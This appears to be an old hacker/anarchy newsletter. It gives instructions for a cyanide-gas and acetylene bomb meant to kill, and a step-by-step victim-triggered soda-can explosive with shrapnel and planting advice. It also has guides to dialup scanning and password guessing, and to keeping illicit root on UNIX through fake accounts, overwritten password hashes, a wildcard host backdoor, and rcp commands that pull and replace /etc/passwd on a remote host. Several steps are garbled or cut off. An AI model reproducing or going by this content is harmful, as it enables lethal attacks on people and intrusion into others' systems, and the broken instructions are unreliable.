 ## | Article Title                   | Author         Size | Content |
----+---------------------------------+--------------+------+---------+
 02 | Death Grenade II                | Sentinel     | 002K | Anarchy |
 03 | The Deadly Soda Can             | Garbled User | 010K | Anarchy |
 04 | Eight Line Wiring               | Garbled User | 007K | Phreak  |
 05 | Di-Nitro Napthalene             | Garbled User | 004K | Anarchy |
 06 | The Wonderful World of Thermite | Garbled User | 003K | Anarchy |
 07 | The Force Grenade               | Sentinel       002K | Anarchy |
 08 | List of Internet Numbers        | *UNKNOWN*    | 048K | Hacking |
 09 | Idiot Hacking II                | Garbled User | 005K | Hacking |
 10 | What to do with the UNIX root   | Garbled User | 005K | Hacking |
 11 | The Name Game                   | Garbled User | 006K | Misc    |
 12 | Editorial on us LOW-RANGE users | Garbled User | 004K | Misc    |
     Well, on with the articles!

*******************************************************************************
                             Death Grenade Two!

Start  out  by  reading  the  previous   carbide.fbi  text  in  the  first
newsletter. Put the baloon  in... as directed,  but first  make sure its pretty
dry ( set it out somewhere for a  day... or use a hair dryer, etc.. ) then toss
some vinegar and some Sodium Ferrocyanide ( a crystalized substance... mine was
blue ) then throw in the calcium carbide. ( for a better bomb,  put the CC in a
separate  holder, if the bottle top is big enough ) Now, put this  outside away
from people for a few  days...  so the vinegar and the  Sodium Ferrocyanide can
make Hydrogen Cyanide (i think) anyways, after the few days,if the bomb dosen't
explode (make sure its in a cool place, FAR away from anything living ( and NOT
the fridge ) you shake it so the baloon bursts and mixes with the CC.  Put this
somewhere where the victim is going to go  (you have about 30 seconds before it
goes off) also, leave a burning rag next to it. this will cause an explosion of
acytylene gas, hydrogen  cyanide, flame and  shattered glass  at about 300 FPS.
the kill range is about 5 feet. the Fuck up really bad range is up to about 10-
15 feet. If you watch this go off... make sure yer 80-100 feet away because the
cyanide  gas  goes FAR.  If you just want  an explosion,  just use  the CC  and
water... its not QUITE as deadly. NOTE: I havent wanted to kill anyone that bad
recently, and hence, this recipe hasn't been tested. So be careful.

*******************************************************************************
                T  H  E    S  O  D  A    C  A  N  .  .  .  .

This is one of  the most deadly, evil,  vile, destuctive and just plain
dire  explosive  devices  known  to  the  FBI.  This  weapon  operates  on  the
"Deadman's  Switch"  theory, but is easily  disguised as an  innocent recylable
object.  The  reason it is so  demonic, is that once it is set, merely TOUCHING
the device will  set it off.  Thus one  could place it on a  doorstep, behind a
car, or just  in the middle of the street  where some  innocent passer-by could
mistakenly set  it  off.  Even  worse,  some  cheap  fool,  or  environmentally
concious  person  could  set  it  off.  Depending on what type of explosive you
use, and whether  or not you add  shrapnel, the device's power could range from
a small flare, to a tremendous detonation!
The concept  is quite simple, and will be given in an easy step by step
format, for your reading pleasure. :)

1.  to detonate a city block, or maybe just a small, but powerfull explosion.
2.  Pick up the following ingredients for the bomb:
       (1)   Aluminum can used for soda or beer.  Ranging from 12oz and up.
       (1)   Spool of wire, any color. Preferably solid. Fone wire works nice.
       (1)   Mercury Switch.(optional)
       (1)   Mini SPST Switch.
       (1)   SPST pushbutton switch. Normally ON.
       (1)   Spool of solder, and a nice iron. Neatness counts!
       (1)   Nine Volt Battery.

                                                                                                     7
2A. Now  here's  where your decision in step 1 counts.. If you want a scare
    tactic, Pick  up  some  flash powder (or flare powder) and a  nice 1.5V
    flashlight bulb. ( convieniently available at  your local RADIO-SHACK )

2B. together  some  time.  Go  to  your local  store and  pick up some ammonium
    advised )  a nice #8 blasting cap.   On second thought, making one might be
    work well with Ammonium Nitrate.

2C. some gun powder, or black powder.

3.  off right  underNeatness makes the bomb WORK.

4.  Drill a hole in  the direct center  of the  bottom  of the can,  barely big
                                                                                                     8
    bolt that comes with it.

5.  Now cut a small rectangular hole, near the inside edge of  the botom of the
    can to house the mini switch.

6.  Here is a nice, cheap ASCII diagram.. yes it sux.. but watcha gonna do?

                                       /           |
      |                                     |     ---          |
      +  ----------------------             |                  |
      | V|                    ----------------------------     |
      |  |                                               |     |
      ----                                                \   /
KEY:  9V     : Nine Volt Battery.
      0      : Detonator, or flashlight bulb.
      /      : Mini SPST switch.
     /
      |      : Pushbutton switch.
     ---
     //      : Mercury Switch.
     |,/,\   : Wire.

Ok, now that I've wasted your precious time with that horrid diagram, I will
explain it.  The Wires leading to and from the mercury switch are NOT TO BE PUT
in if the mercury switch is omited.
Simply enough, The current goes through the wires to the first  switch,
if the  first switch is ON, it goes to the  next switch,  If this switch is on,
It goes to the  detonator, which in turn explodes the  device.  I reccomend you
test your circuit with a multi-tester before you  go about  construction of the
bomb.  This will help to assure a NON-DUD.  I advize  that you  remove the nice
detonator before doing this, unless of course you are a massochist.

7.   the good ol nine-volt battesafety's sake.  MAKE SURE NO WIRES TOUCH EACHO
     alas.. a good militant was he.

8.   OK, fill the can up about 1/4th the way up with your explosive of choice.
     Pack if  desired.  Get a  small  amount of  shrapnel if  desired and  add
     generously.  Add  no  more  than  1/4th  the  total  wieght  of  the can.
                               
                                                                      1

9.   set off the detonator.

10. If you  are  mercury-less place the detonator here. If you used the  switch
    fill  the can  with enough  explosives to cover  your newly  placed switch.
    If you have used the flashlight  bulb, now is the  time to  CAREFULLY break
    screw up.. your bad luck.

11. the can the rest of the way up.

12. Get out the epoxy and glue the top back on.
     You have just made a soda can..  Now, if you are proceding with this file,
     before  reading it completely, you are probably dead about now.  
     Here's why you died:

                                                                                                     2
   During the final stages, you  left the mini switch  ON.  This is  the arming
   switch, and should ONLY be used during testing, and planting.
   You managed to build up a large  amount of static electricity and discharged
   it into a can  full of  explosives.  Bad move.  Use  ANTI-Static spray to 
   avoid this.
   You did this by a nice, warm open fire. Or better  yet you smoked nearby the
   device.  Bravo on an excellent demise.
   You left  the device stiing in your nice hot window  sill, where it exploded
   killing your family. I applaud you.
   You  decided  my instructions  weren't  good  enough for you, and WINGED it.
   You let some wires touch in the  final stage of  construction. Avoid this by
   coating  all  wires and  leads with  melted plastic, or use electical tape. 
   The first method is prefered.

   Well, If you got this far.. you are alive. (I hope!!)
                                                                                                     3

OK, you have yer nice,  prepared device, and wish to plant it.  This is
simple.  Sort  of.  There  is  a  danger  factor  involved,  so  be forewarned.
ake the  device  to the  site.  DO  NOT  arm it until it is  absolutly
ready! This is  CRITICAL !  The easiest place to put is is on a raised platform
such as a door step.  Place  the can on  the edge  of the step, make sure it is
perfectly vertical.  The Pushbutton switch should be  pushed in now, and in
OFF position.  Now  CAREFULLY arm the device.  CAREFULLY slide it over to about
the  center of  the door step, so  that it gets  kicked over when someone steps
outside.  If you  used the mercury switch, you now realize why it  is optional.
If you move the can too fast, the switch will detonate you.
You  are  placing  this on a  large flat surface, using  the mercury
switch is HIGHLY advised against!  Place  a VERY thin sheet of paperboard under
your can, compressing the bottom switch.  Poke a hole in the bottom of the can,
so that it can be armed.  Arm the device, and place it on the ground. Push down
on the top of the device, and SLOWLY remove  the paperboard.  If the paperboard
was thin enough you survived.
Get the hell out of there, and  DO  yourself a favor, and wear gloves..
finger prints are WAY uncool.
Ok,  The  mercury switch is  VERY VERY  dangerous, but it also makes it
absolutely  impossible  to  disarm the  bomb  should  someone discover it.  The
paperboard can  be simply  cut away  from the  edges in the  flat surface bomb.
this can be extremely  useful in circumstances  where you are  placing the bomb
in an area  that is very  bumpy, or rocky, like loose sand or  dirt.  Or if you
just prefer to keep your life.
How Your Bomb Works:
Well, simply enough, once it is armed, if the pushbutton  switch is released
the circuit  will be completed.  With  the mercury  switch added, if either the
switch or  the button  is tripped, it  will explode.  The current  will set off
the  detonator, or  if  you  used  the  flashlight bulb, It will  cause a  high
intensity  flame to  be produced  for about  1-2 seconds.  This is quite enough
to explode any light explosive.
To tell  you the truth, you can use any explosive  that you desire with this
bomb.  One time  I even saw one of these made completely of THERMITE. Holy shit
the  whole  can just  melted, and fused  with the  road tar.   If you want, you
can use plastique, or just pour in some nitroglycerine(HA!).
*******************************************************************************
   IDIOT HACKING II
         The revenge of the fool killers!
         Rwho?  What?  Who?  Finger?  W?  Unix?  Telent?  Dialup?

The trick  is of course.. quite simple.  First, find the local port dialup
for your area's  university,  corporation, etc.   Ok,  now  pull  out yor modem
set it at E71, and dial.  You  can't find  any  dialup  numbers??   ARGH!  Well
this is simple..  Pull  out a  fone book  and a  prefix  scanner.  Look  up the
local university, and see what it's numbers are.  Usually the U  will have  all
of it's numbers in a single  prefix.  Scan that  prefix  for  carriers.  If the
university has all different  prefixes, you could be in trouble. Scan around in
those areas.  Ex- University  of East BubbaFuck  Computer  Center 666-1313.  Ok
scan 666-1300 to 666-1399  Have fun.  The same method must   be used with large
corporations.  Mainly ones dealing in computers.
Ok your in.. usually you will see some sort of strange login after hitting
return at least 500 times. Ex.
<300 CR's>
ACS PORT DIALUP
2400 QB13 tty666
Type ? for help.
Enter your destination
> Well great.. now what?  Duh.. If it offers help.. TAKE it!
>?
Enter one of the following areas
blackcube   asmodeusland   deathville   quadline
sunset      uebvm          lineuebvm    uebVAX
slownet     crisco
                                                                                                     2

Or type one of these commands
help        hangup         showspeed    procecuteme

>

Ok..   Now..   anything  that says  VM  should be immediately avoided.  Vm is
quite possibly the worst  operating  system  ever invented. LineVM is equally
as worthless.  In my opinon  VAX/VMS is  the the  best, but it is hell to get
into.. SO if yer  new.. avoid  it.  Sunset  might be  a sunOS unix..  But you
never  know.  SunOS  is FUN!  Blackcube  is obviously a NeXt, as are anything
else with the words  black  or cube  in them.  Quadline  might be  a  dialout
system,  or  one  of  those  horrid router  systems.   Slownet and crisco are
routers ( which can be  fun..  but not very  often )  uebVAX is a VAX.. duh..
The others,  asmodeusland  and deathville,  could be  anything..  most likely
the main system for that university.. DEFINATELY try these out!

>asmodeusland
Portdialup calling ASMO QB13, tty9
SunOS UNIX 4.3.1 (asmodeusland)
                                                                                                     3

login:
Oh shit.. now what?  OK.. this is where the fun comes in! finger it out
yourself!

login:finger
password:finger
Incorrect login
login:w
  jqbroin     13:25      telnet cube
  bolsdew     15:31      ls
  what        19:00      what
  operator    01:01      chuser bob
YOU DID it!  Usually you have to go through about 4 years of this.. You have
to   try  the   following  rwho  password  rwho,  who/who,  what/what,  w/w,
finger/finger.   Most of  the time  it won't  ask for  a password.  Now just
idiot hack these beautiful  accounts  you saw  above!   jqbroin.. try broin,
jq, jqbroin,jbroin,qbroin..and anything else you can think of!
The what is you for your information.
OK,  you've got an account after many hours of using who accounts and idiot
hacking.  Now  what?   Well  find  out  what  sort  of access you have!  Look
around your directory a bit.  But there are THREE things you ALLWAYS do first
when you enter a new account!!  #1, look at the last login date that shows up
right before the system announcements.  If it is recent.. forget it.  Use the
account to do some real  idiot hacking  ( See FBI 0001,  Idiot Hacking ).  If
the date is nice and ancient..  Have fun.  #2 type "history" read the last 40
commands.  If  the  guy  has  been  doing  all  sorts  of super - complicated
programming and the such.  Forget it.  You'll die  real  fast..   If  the guy
sends out 400 mail  messages a day,  forget it.  You'll be found out to fast.
If all  he does  is login,  check his  mail and logout.. or something equally
stupid..  take it from the fool.  What sort of  idiot has a password the same
as his login name  anyways!?  #3,  check out if he  has a ton of mail.. If so
find a new one.  Type  finger XXXXX where XXXX is your account name.. If it's
a professor or something... well.. it's up to you.. but be careful.
Ok, now try to send mail somewhere (us!) outside your local area.  Wait
about  10 seconds,  and check your mail.. if there is a reply from the mailer
daemon.. You have a shit system. ( no mail!! )  Now type  rn,  Rnews,  Pnwes,
Inews.. see what you can get  into.  Try listing your  directory..  See  what
sort of neeto toys are there for you to play with.
Well... I hope you have fun with your new accounts!  Remember to try
as  many  areas on  your dialup  that you  possibly can!  Enjoy your dayz!

*******************************************************************************
                       What to do with ROOT@UNIX
                       -=-=-=-=-=-=-=-=-=-=-=-=-=  

OH yeah.  This one covers what to do ONCE you HAVE  root, not how to
get root.  So don't expect any magical formula here.
Ok,  you've logged onto your fave  system with root.  Now, the first thing
you will want to do is secure things for  yourself.  Do this at about midnight.
That is generally a good time to hack.   You log in as root, look around.  Who,
what, ps, etc.etc...  Make  sure the REAL  root isn't on.. or you could  be one
dead dude VERY fast.  Ok, your safe.. not to many users on the system, no other
sysadmin  accounts on, ( daemon, uucp, sysadmin, etc. ) You will want to secure
your session.  Write down the current root password  somewhere.  Now change the
password.  This will keep the real root from logging in while you are on.  MAKE
sure  you change it back before you log off, or you could be in  some deeeeeeep
shit.  Now, you will want to secure your place on this system.  Use the adduser
( or something to that effect ) to create  a few  bogus users.  Now  check  the
/etc/passwd file to be sure they are in there.  Make them seem real, follow the
guidelines on  your system for  making them.  Example- My system uses the first
                                                                                                     7
letter of the first name,and the last name as the username. So my name would be
guser.  Follow  whatever  the  formula  is.  Use a  few real sounding  names, I
usually use Ralph Norwieg or Peter Franklin. (rnorwieg,pfrankli) As you can see
it would be very hard to tell these are actually hacked accounts.

     Next you  want to steal a  few junked  accounts.  Find a few accounts that
have never been used, or have only been used once or twice.  6 months since the
last  login  is a  good place for you to start.   You can  grab these  accounts
easily.  Read the  /ect/passwd file,  look  at one  of the  accounts  you  just
created.  Write down the password for that account, In it's ENCRYPTED form. Now
edit the passwd file  so that you replace the passwords of all the accounts you
want to take with the encrypted code you just wrote down.  Get it?  You will be
making all those accounts have the same passwd as the one you took the code off
of.  At your leisure enter  the accounts and change the passwd to what you want
it to be.

     Ok, you are now WELL established on that system.. the real root will never
get rid  of you.  But  what if  he does?   You have  to leave  some gates open!
Here's what you do.  Edit the /etc/hosts file, so that the only line in it is a
"+" That's right just a plus sign. Delete the rest.  This will allow you to log
                                                                                                     8
in from any  other system  in the  internet.  This way  you can  telnet in from
anywhere in the world and hack away!

     Ok, now  activate the  finger login.  This will let you login with account
finger  and look around a bit.   Like finding  users to idiot  hack.  Add this:
/usr/sbin/in.rwho      the end of  /etc/inetd/rc.inet
    This activates rwho. Which allows you to see who's on from a remote system.
/etc/inetd.conf     Just delete the comment symbol (a #) in front of the finger
command. IF I remember correctly, you also have to add this to your /etc/passwd
file.  If so just add "finger::"  that should do nicely.

    Now, while you have the chance, grab some user lists from around the world.
Hopefully  you have  with you a  nice  big  telnetable  hosts list.  I'll do an
example using trantor.ee.msstate.edu
rcp trantor.ee.msstate.edu:/etc/passwd /etc/trantor.passwd

This will execute a remote copy from the other system to you. Feel free to edit
this file as you please, and keep a copy for yourself. Now that you have edited
it to your liking (changing passwords) type the following.
rcp /etc/trantor.passwd trantor.ee.msstate.edu:/etc/passwd
                                                                                                     9

  You have just placed your edited passwd file onto that system.  Logically one
could start a wave of system takeovers throught the US using this method. But I
HIGHLY  advise against this,  because it may lead to the loss of my beloved rcp
command.  Also, this works on most systems.. but be warned, there is probably a
system out there somewhere where it does not.  So don't yell at me if you can't
edit the passwd file on your  fave site.  Mainly  you should use  the  file for
idiot hacking purposes ONLY.  But this sure is easier.. and by that  same note,
MUCH more dangerous, you could end up  stealing an  intelligent user's  account
somewhere.. which is ALLWAYS a  bad move.  Smart users  complain when they lose
their accounts.

    Well, thats all I have for you this month.. Enjoy.  Maybe next month I will
think  of some more lunatic  things to do to those poor defenceless UNIXes  out
there..  See you on the USENET!

